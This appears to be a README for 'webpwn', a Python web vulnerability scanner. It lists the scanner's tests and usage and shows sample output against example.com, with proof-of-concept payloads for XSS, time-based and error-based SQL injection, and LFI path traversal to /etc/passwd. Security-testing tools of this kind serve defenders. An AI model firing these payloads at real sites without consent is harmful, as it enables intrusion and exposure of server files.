Web Vulnerability Detector (XSS,SQL,LFI,XST,WAF)

farinap5/webpwn

WebPwn

Web Vulnerability Scanner


Features

Web Application Firewall (WAF) detection.

Cross Site Scripting (XSS) tests (reflected payloads, raw and URL-encoded).

Time-based blind SQL injection test.

Error-based SQL injection test.

Local File Inclusion (LFI) test.

Cross Site Tracing (XST) test.


Download and Run

git clone https://github.com/farinap5/webpwn.git

cd webpwn

python3 webpwn.py http://example.com/page.php?cat=1

Quote the URL if it carries more than one parameter: an unquoted & is taken by the shell as a background operator, so everything after it never reaches webpwn.


Example of Output

python3 webpwn.py http://example.com/page.php?cat=1

[*] No WAF Detected.

    WebPwn
    ------
Target: http://example.com/page.php?cat=1

Server: nginx/1.19.0
Data: Mon, 07 Dec 2020 18:24:50 GMT
Powered: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1

[!] Testing XSS
[!] 10 Payloads.
[+] 9 Payloads were found.

[*] Payload found!
[!] Payload: <script>alert("inject")</script>
[!] POC: http://example.com/page.php?cat=<script>alert("inject")</script>

[*] Payload found!
[!] Payload: %3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E
[!] POC: http://example.com/page.php?cat=%3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E

[!] Testing SQLi
[*] Blind SQL injection time based found!
[!] Payload: 1-SLEEP(2)
[!] POC: http://example.com/page.php?cat=1-SLEEP(2)

[*] SQL Error found.
[!] Payload: '
[!] POC: http://example.com/page.php?cat='

[!] Testing LFI
[*] Payload found!
[!] Payload: ../../../../etc/passwd
[!] POC: http://example.com/page.php?cat=../../../../etc/passwd


[!] Testing XST
[*] This site seems vulnerable to Cross Site Tracing (XST)!


Disclaimer

Usage of webpwn against targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state, federal and international laws.
The developer assumes no liability and is not responsible for any misuse or damage caused by this program.